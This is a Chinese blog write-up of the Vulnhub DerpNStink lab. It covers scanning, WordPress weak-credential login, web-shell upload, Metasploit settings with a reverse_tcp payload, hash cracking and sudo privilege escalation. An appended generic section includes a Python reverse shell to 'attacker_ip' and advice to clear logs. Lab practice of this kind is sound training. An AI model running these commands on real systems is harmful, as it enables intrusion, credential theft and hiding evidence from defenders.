Vulnhub:Derpnstink靶机渗透

本文通过一次实战演练详细介绍了如何使用Kali Linux对目标系统进行渗透测试的过程。从初始的网络扫描开始,逐步深入到利用WordPress网站的弱点获取系统权限,最终完成提权获得root访问权。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

攻击机kali:192.168.56.108

靶机derpnstink:192.168.56.114

 

扫描同网段下存活主机

fc9d3b282e794334ab2fd7d1aa8535de.png

扫描服务版本信息

9d75e0ff8d714801afeac4ca216feecb.png

 

开启了21、22、80端口,分别对应着ftp、ssh、http服务,打开浏览器进行访问

db94c83955dc4c6085dfdb6f7880ede8.png

 

查看源代码发现flag1和info.txt

9a3583d398ef42a89f89a29ea4297acd.png

 点开info.txt

d2588d87a0ea475e84a5c523b6beb0e6.png

这个的意思就是要让我们在本地添加一个dns解析,先不管 因为还不知道具体要添加的东西

接着使用工具扫描网站目录,发现了robots.txt文件,weblog目录下存在登录页面,php目录下有phpmyadmin,都访问看看有什么有用的信息,太多了这里就不一一列出了

cf099bf3d4d84c9fb112ba23db17f818.png

进行访问的时候会发现weblog目录下的都打不开

12974d2f410f484fb904c4adb0e4c57e.png

刚好前面也拿到提示说要在本地添加一个dns记录,

Linux系统在/etc/hosts文件中进行添加

525202606abf4ef29c3e0aa5da51eb60.png

添加了之后就可以正常访问了,访问刚刚扫目录得到的登录页面,

3b3637aba9b2473387829eb1106c6985.png

很明显是一个wordpress的网站

使用awvs扫描网站发现存在弱口令admin/admin

a60a9fda753749b6b6624801cf84cfab.png

 登录到刚刚的网站

3254efea72d047faa8d3f1295ed6e82e.png

 

登录成功后在slideshow的manage slides的add new发现可以上传文件,二话不说直接传个马然后蚁剑连接

cc07c6c1e1b043db87fdf440add63677.png

查找配置文件并查看,拿到数据库的用户名和密码

27c8bad5f803427e91e92f6ebcc746b1.png

获取数据库用户名和密码的第二种方法:

使用wpscan对wordpress网站进行扫描

d54e94bd3a294bbe8402ae3ee54dc3a2.png

发现这个插件存在漏洞,进入msf查看有没有可以利用的模块

b08bb28290874c29ab7f504c8186baae.png

发现存在可以利用的模块,直接一把梭拿shell

use 1

set payload php/meterpreter/reverse_tcp

set rhosts 192.168.56.114

set lhost 192.168.56.108

set targeturi /weblog

set wp_user admin

set wp_password admin

 

78e3a35389aa4f58a6b956a7d44ab7da.png

shell,进入一个交互式的shell,然后查看配置文件cat /var/www/html/weblog/wp-config.php

d171a2308263474b8053bea6c7e8e20b.png

发现了数据库的账号密码,而前面找到的phpmyadmin页面就是一个mysql数据库管理页面,进行登录,登录成功后经过一番寻找发现了flag2

165ad58b55f54f5f9ca49245f34793c3.png

同时还发现了另外一个账号密码

e7f222aaeeda42159542c05af47260c5.png

将密码的哈希值保存到一个文件里,然后用john进行解密

47a170fad8f24a8ca9f76bd6ce05ded4.png

 639db01fc76c46b4ae6e7503b174fb5b.png

得到密码为wedgie57,同时在班级home目录下发现了两个用户:mrderp,stinky

尝试切换到stinky用户,密码使用刚刚破解得到的wedgie57

dd40ceef6add4d4bb81080ae761135cc.png

成功切换到stinky用户,进入到stinky目录并查看当前目录的所有文件

03775676e1eb42a2b9e083664ac12e07.png

在Desktop目录发现了flag3

04b360376f7744388a4d307fa50f36c1.png

在Documents目录发现了一个derpissues.pcap数据包文件,但是发现无法将其下载到本地,可以先将其复制到tmp目录下,然后在蚁剑拿到的shell中将其进行下载,下载之后用wireshark打开进行分析,过滤,发现了mrderp的登录密码

4a16384b6366468b8bb45d58adacf6fb.png

在shell里切换登录到mrderp,发现不可行

d2f97a33c0e242559a12b028b1ccdeb4.png

接着尝试使用ssh进行远程连接

d66f68a3fe6f4aa4ba06c791a8ec0983.png

连接成功,并在Desktop目录下发现了一个日志文件

6a1e4befe6154700bb44defacc218c59.png

打开后发现是个聊天记录,要我们访问https://pastebin.com/RzK9WfGw

4a85c8fa1c824be1829fa77000eb72e5.png

9dd56ee66f984a48af6d63a545c90e95.png

根据该信息的提示,使用二进制提权。先创建一个binaries文件夹,进入到binaries文件夹将/bin/bash写入到derpy.sh文件中并赋予其权限,然后使用sudo命令运行该文件就成功提权为root权限了

mkdir binaries

cd binaries

echo “/bin/bash” >> derpy.sh

chmod +x derpy.sh

sudo ./derpy.sh

 

a9322fd9b9834825ab6b74b255616919.png

最后在root目录下的Desktop目录找到最后一个flag

 

### derpnstink 靶机渗透测试 CTF Writeup #### 初始信息收集 对于任何渗透测试活动,初始的信息收集阶段至关重要。在这个阶段,目标是尽可能多地了解目标系统 `derpnstink` 的公开可用信息。这通常涉及使用工具如 Nmap 进行端口扫描来识别开放的服务和版本。 ```bash nmap -A derpnstink ``` 上述命令会执行一个带有操作系统检测、版本检测、脚本扫描以及 traceroute 功能的全面扫描[^1]。 #### 枚举服务漏洞 一旦获得了关于哪些服务正在运行的信息,下一步就是针对这些特定服务进行更深入的研究。例如,如果发现了一个 Web 服务器,则可以利用诸如 Nikto 或者 Dirbuster 工具来进行进一步枚举: ```bash nikto -h http://derpnstink/ dirb http://derpnstink/ wordlist.txt ``` 这里假设存在 HTTP(S) 协议上的 web 应用程序,并尝试通过字典攻击寻找隐藏目录或文件[^2]。 #### 漏洞利用准备 当找到潜在可被利用的安全弱点之后,就需要查阅 CVE 数据库或其他资源确认具体细节并下载相应的 exploit 脚本。Metasploit 是一个非常流行的框架,在其中可能已经包含了所需的模块可以直接调用;当然也可以自己编写 Python/Ruby 等语言实现自定义 payload 发送逻辑。 #### 获取初步访问权限 成功发送恶意载荷后,可能会得到一个低级别用户的 shell 访问权。此时应当立即稳定住这个连接(比如反向 TCP Shell),以便后续操作更加方便可靠[^3]. ```python import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("attacker_ip",port)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]); ``` 这段代码展示了如何建立一个简单的 Python 反弹shell 来维持与受控主机之间的交互式 session[^4]. #### 提升权限 Privilege Escalation 获得最初的立足点只是第一步而已,很多时候还需要想办法提权成为管理员账户才能完成最终的目标——读取 flag 文件内容。这时就要考虑是否存在配置错误、弱密码或者其他未打补丁的内核级 bug 等情况了。 #### 清理痕迹 Cover Tracks 最后但同样重要的是,在退出之前务必清理掉所有留下的日志记录和其他能够暴露身份特征的东西,以免留下不必要的麻烦给防守方人员带来困扰。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值